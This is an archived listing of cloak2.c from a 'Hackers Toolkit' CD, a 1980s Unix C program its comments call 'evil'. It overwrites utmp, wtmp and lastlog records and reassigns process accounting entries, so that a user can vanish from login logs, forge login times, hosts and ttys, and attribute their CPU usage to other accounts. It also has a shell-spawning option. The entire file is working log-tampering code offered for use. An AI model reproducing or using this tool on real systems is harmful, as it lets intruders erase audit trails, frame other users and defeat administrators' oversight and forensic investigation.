home *** CD-ROM | disk | FTP | other *** search

---

/ Hackers Toolkit v2.0 / Hackers_Toolkit_v2.0.iso / HTML / archive / Unix / Cloaking / cloak2.c

< prev

next >

Wrap

C/C++ Source or Header  |  1999-11-04  |  11KB  |  390 lines

---

1.  
2. /*
3.  *      C L O A K
4.  *
5.  *      Wrap yourself in a cloak of darkness (heh heh heh).
6.  *
7.  *      Michael S. Baldwin,  Matthew Diaz  1982
8.  *
9.  *      Marcus J. Ranum - 1983 - complete re-write and munging
10.  *      added more options, and all kinds of evil - including the
11.  *      ability to vanish from wtmp and acct as well as utmp. Added more
12.  *      error checking and useful command syntax. Now you can attribute
13.  *      all *YOUR* CPU usage to others when playing hack !!!
14.  *
15.  */
16.  
17.  
18. #include <stdio.h>
19. #include <sys/types.h>
20. #include <utmp.h>
21. #include <pwd.h>
22. #include <lastlog.h>
23. #include <sys/file.h>
24. #include <sys/acct.h>
25.  
26. /* set these guys. If you're sysV a port should be easy */
27. #define UTMP    "/etc/utmp"
28. #define WTMP    "/usr/adm/wtmp"
29. #define LAST    "/usr/adm/lastlog"
30. #define ACCT    "/usr/adm/acct"
31.  
32.  
33. main(ac,av)
34. int     ac;
35. char    *av[];
36. {
37.         char    *tp     = "";
38.         char    *un     = "";
39.         char    *hn     = "";
40.         char    *pn     = "";
41.         long    newt    = 0L;
42.         int     wflg    = 0;
43.         int     aflg    = 0;
44.         int     refs    = 1;
45.         int     x;              /* klunch */
46.         char    *p;
47.         extern  char    *index();
48.         extern  time_t  time();
49.  
50.         for(x = 1; x < ac; x++) {
51.                 if(av[x][0] == '-')
52.                         switch(av[x][1]) {
53.             case 'u':       /* username to be :-) */
54.                                         if((x + 1) < ac)
55.                                                 un = av[++x];
56.                                         break;
57.  
58.                       case 't':       /* tty slot to be on :-) */
59.                                         if((x + 1) < ac)
60.                                                 tp = av[++x];
61.                                         break;
62.  
63.                       case 'h':       /* host name to be on :-) */
64.                                         if((x + 1) < ac)
65.                                                 hn = av[++x];
66.                                         break;
67.  
68.                       case 'r':       /* # of refs to zap :-) */
69.                                         if((x + 1) < ac)
70.                                                 refs = atoi(av[++x]);
71.                                         break;
72.  
73.                       case 's':
74.                                         execl("/bin/sh","sh",0);
75.                                         perror("exec");
76.                                         exit(1);
77.  
78.                       case 'w':       /* vanish from wtmp, too */
79.                                         wflg++;
80.                                         break;
81.  
82.                       case 'a':       /* vanish from acct, too */
83.                                         aflg++;
84.                                         break;
85.  
86.                       case 'p':       /* specific program for acct */
87.                                         if((x + 1) < ac)
88.                                                 pn = av[++x];
89.                                         break;
90.  
91.                       case 'l':       /* log on time */
92.                                         if((x + 1) >= ac)
93.                                                 break;
94.                                         newt = atoi(p = av[++x]);
95.                                         if(p = index(p,':'))  {
96.                                                 newt *= 60;
97.                                                 newt += ((newt > 0) ? 1 : -1) *
98. atoi(++p);
99.                           }
100.                                         newt *= 60;
101.                                         newt += time((long *)0L);
102.                                         break;
103.  
104.                       default:
105.                                         exit(usage());
106.                       }
107.  
108.           }
109.  
110.         if(wflg && wtmpzap(tp,un,hn,newt,refs))
111.                 perror(av[0]);
112.  
113.         if(aflg && acctzap(un,pn))
114.                 perror(av[0]);
115.  
116.         if(utmpzap(tp,un,hn,newt)) {
117.                 perror(av[0]);
118.                 exit(1);
119.           }
120.  
121.         if(lastzap(tp,un,hn,newt)) {
122.                 perror(av[0]);
123.                 exit(1);
124.           }
125.  
126.         exit(0);
127.       }
128.  
129. utmpzap(tt,un,hn,tim)
130. char    *tt;
131. char    *un;
132. char    *hn;
133. long    tim;
134. {
135.         int     fd;
136.         int     slot;
137.         struct  utmp    ubuf;
138.         extern  time_t  time();
139.         extern  char    *strncpy();
140.         extern  long    lseek();
141.  
142.         if((slot = ttyslot()) == 0) {
143.                 (void)fprintf(stderr,"No tty slot");
144.                 return(-1);
145.           }
146.  
147.         if((fd = open(UTMP,O_RDWR)) == -1 )
148.                 return(-1);
149.  
150.         if(lseek(fd,(long)(slot * sizeof(ubuf)),0) < 0) {
151.                 (void)close(fd);
152.                 return(-1);
153.           }
154.  
155.         if(read(fd,(char *)&ubuf,sizeof(ubuf)) != sizeof(ubuf)) {
156.                 (void)close(fd);
157.                 return(-1);
158.           }
159.  
160.         if(tim)
161.                 ubuf.ut_time = tim;
162.         else
163.                 ubuf.ut_time = time((long *)0L);
164.  
165.         (void)strncpy(ubuf.ut_name,un,sizeof(ubuf.ut_name));
166.  
167.         if(!tt[0] == '\0')
168.                 (void)strncpy(ubuf.ut_line,tt,sizeof(ubuf.ut_line));
169.                 (void)strncpy(ubuf.ut_host,hn,sizeof(ubuf.ut_host));
170.  
171.         if(lseek(fd,(long)(-sizeof(ubuf)), 1) < 0) {
172.                 (void)close(fd);
173.                 return(-1);
174.           }
175.  
176.         if(write(fd,(char *)&ubuf,sizeof(ubuf)) != sizeof(ubuf)) {
177.                 (void)close(fd);
178.                 return(-1);
179.           }
180.  
181.         return(close(fd));
182.       }
183.  
184. wtmpzap(tt,un,hn,tim,refs)
185. char    *tt;
186. char    *un;
187. char    *hn;
188. long    tim;
189. int     refs;
190. {
191.         int     fd;
192.         char    *p;
193.         char    tbuf[40];
194.         struct  utmp    ubuf;
195.         extern  char    *strncpy();
196.         extern  char    *strcpy();
197.         extern  char    *rindex();
198.         extern  char    *ttyname();
199.         extern  long    lseek();
200.         extern  time_t  time();
201.  
202.         if((p = ttyname(0)) != NULL)
203.                 (void)strcpy(tbuf,p);
204.         else
205.                 return(0);
206.  
207.         /* figure out our device name */
208.         p = rindex(tbuf,'/');
209.         if(p == NULL)
210.                 p = tbuf;
211.         else
212.                 p++;
213.  
214.  
215.         if((fd = open(WTMP,O_RDWR)) == -1 )
216.                 return(-1);
217.  
218.         if(lseek(fd,0L,2) < 0)
219.                 return(-1);
220.  
221.  
222.         /* this is gross, but I haven't a better idea how it can */
223.         /* be done - so who cares ? */
224.  
225.         while(refs) {
226.                 if((lseek(fd,(long)(-sizeof(ubuf)),1)) < 0) {
227.                         (void)close(fd);
228.                         return(0);
229.               }
230.  
231.                 if(read(fd,(char *)&ubuf,sizeof(ubuf)) != sizeof(ubuf)) {
232.                         (void)close(fd);
233.                         return(0);
234.               }
235.                 if(!strcmp(p,ubuf.ut_line)) {
236.                         if(tim)
237.                                 ubuf.ut_time = tim;
238.                         else
239.                                 ubuf.ut_time = time((long *)0L);
240.  
241.                         (void)strncpy(ubuf.ut_name,un,sizeof(ubuf.ut_name));
242.                         (void)strncpy(ubuf.ut_host,hn,sizeof(ubuf.ut_host));
243.  
244.                         if(!tt[0] == '\0')
245.  
246. (void)strncpy(ubuf.ut_line,tt,sizeof(ubuf.ut_line));
247.  
248.                         if(lseek(fd,(long)(-sizeof(ubuf)),1) < 0) {
249.                                 (void)close(fd);
250.                                 return(0);
251.                   }
252.  
253.                         if(write(fd,(char *)&ubuf,sizeof(ubuf)) !=
254. sizeof(ubuf)){
255.                                 (void)close(fd);
256.                                 return(0);
257.                   }
258.  
259.                         if(lseek(fd,(long)(-sizeof(ubuf)),1) < 0) {
260.                                 (void)close(fd);
261.                                 return(0);
262.                   }
263.  
264.                         refs--;
265.    }
266.  
267.                 if(lseek(fd,(long)(-sizeof(ubuf)),1) < 0) {
268.                         (void)close(fd);
269.                         return(0);
270.    }
271.  
272.    }
273.  
274.         return(close(fd));
275.    }
276.  
277. acctzap(un,pn)
278. char    *un;
279. char    *pn;
280. {
281.         int     fd;
282.         int     faku =0;
283.         int     realu;
284.         struct  acct    actbuf;
285.         struct  passwd  *pwt;
286.         extern  struct  passwd  *getpwnam();
287.  
288.         if((fd = open(ACCT,O_RDWR)) == -1 )
289.                 return(-1);
290.  
291.         realu = getuid();
292.  
293.         if(un[0] != '\0' && ((pwt = getpwnam(un)) != NULL))
294.                 faku = pwt->pw_uid;
295.  
296.         while(1) {
297.                 if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)) {
298.                         (void)close(fd);
299.                         return(0);
300.               }
301.  
302.                 if(realu == actbuf.ac_uid) {
303.  
304.                         /* only zap a specific program to user */
305.                         if(pn[0] != '\0' && strcmp(pn,actbuf.ac_comm))
306.                                 continue;
307.  
308.                         actbuf.ac_uid = faku;
309.                         actbuf.ac_flag &= ~ASU;
310.                         if(lseek(fd,(long)(-sizeof(actbuf)),1) < 0) {
311.                                 (void)close(fd);
312.                                 return(0);
313.                   }
314.  
315.                         if(write(fd,(char *)&actbuf,sizeof(actbuf)) !=
316. sizeof(actbuf)){
317.                                 (void)close(fd);
318.                                 return(0);
319.                   }
320.               }
321.           }
322.       }
323.  
324. usage()
325. {
326. #ifdef USAGE
327.         (void)fprintf(stderr,"usage: cloak <options>\n");
328.         (void)fprintf(stderr,"options are:\t-l <+->hh:mm (login time)\n");
329.         (void)fprintf(stderr,"\t\t-u username\t\t\t-t ttyname\n");
330.         (void)fprintf(stderr,"\t\t-w (clobber wtmp)\t\t-r #of refs to
331. clobber\n");
332.         (void)fprintf(stderr,"\t\t-h host\t\t-a (clobber accounting)\n");
333.         (void)fprintf(stderr,"\t\t-p program (attribute only program to
334. acct)\n");
335.         (void)fprintf(stderr,"(no args causes a simple vanishing act)\n");
336. #endif
337.         return(1);
338.       }
339.  
340. lastzap(tt,un,hn,tim)
341. char    *tt;
342. char    *un;
343. char    *hn;
344. long    tim;
345. {
346.         int     fd;
347.         int     uid;
348.         struct  lastlog lbuf;
349.         extern  time_t  time();
350.         extern  char    *strncpy();
351.         extern  long    lseek();
352.  
353.         uid = getuid();
354.  
355.         if((fd = open(LAST,O_RDWR)) == -1 )
356.                 return(-1);
357.  
358.         if(lseek(fd,(long)(uid * sizeof(lbuf)),0) < 0) {
359.                 (void)close(fd);
360.                 return(-1);
361.           }
362.  
363.         if(read(fd,(char *)&lbuf,sizeof(lbuf)) != sizeof(lbuf)) {
364.                 (void)close(fd);
365.                 return(-1);
366.           }
367.  
368.         if(tim)
369.                 lbuf.ll_time = tim;
370.         else
371.                 lbuf.ll_time = time((long *)0L);
372.  
373.         if(!tt[0] == '\0')
374.                 (void)strncpy(lbuf.ll_line,tt,sizeof(lbuf.ll_line));
375.         (void)strncpy(lbuf.ll_host,hn,sizeof(lbuf.ll_host));
376.  
377.         if(lseek(fd,(long)(-sizeof(lbuf)), 1) < 0) {
378.                 (void)close(fd);
379.                 return(-1);
380.           }
381.  
382.         if(write(fd,(char *)&lbuf,sizeof(lbuf)) != sizeof(lbuf)) {
383.                 (void)close(fd);
384.                 return(-1);
385.           }
386.  
387.         return(close(fd));
388.       }
389.  
390.